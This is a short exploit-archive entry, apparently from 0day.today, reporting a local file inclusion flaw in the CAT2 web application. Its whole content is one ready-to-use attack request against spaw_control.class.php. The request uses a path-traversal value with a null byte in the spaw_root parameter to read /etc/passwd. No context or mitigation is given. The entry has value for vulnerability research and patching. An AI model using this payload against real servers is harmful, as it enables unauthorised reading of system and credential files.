id: 3335
date: 06/30/2008
title: CAT2 (spaw_root) Local File Inclusion Vulnerability
author: StAkeR
cves: 

===================================================
CAT2 (spaw_root) Local File Inclusion Vulnerability
===================================================



@~~==========================================================================~~@
|  CAT2 <= 1.Local File Inclusion Vulnerability                                |
@~~==========================================================================~~@
|  objects/extern/spaw/spaw_control.class.php?spaw_root=../../etc/passwd%00    |
@~~==========================================================================~~@



#  0day.today [2023-03-22]  #